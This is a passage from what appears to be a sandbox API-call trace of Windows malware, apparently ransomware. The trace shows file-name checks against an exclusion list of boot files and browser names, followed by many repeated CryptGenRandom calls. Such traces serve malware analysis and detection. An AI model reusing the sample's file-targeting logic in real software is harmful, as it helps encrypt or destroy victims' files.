pszSpec="*bootmgr*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*boot*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*boot*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*IO.SYS*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*ntldr*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*chrome*") returned 0 [0167.471] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*opera*") returned 0 [0167.472] PathMatchSpecW (pszFile="msado26.tlb", pszSpec="*firefox*") returned 0 [0167.472] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", pszSpec="*") returned 1 [0167.472] strlen (_Str="NMoreira") returned 0x8 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.473] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.474] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0167.475] 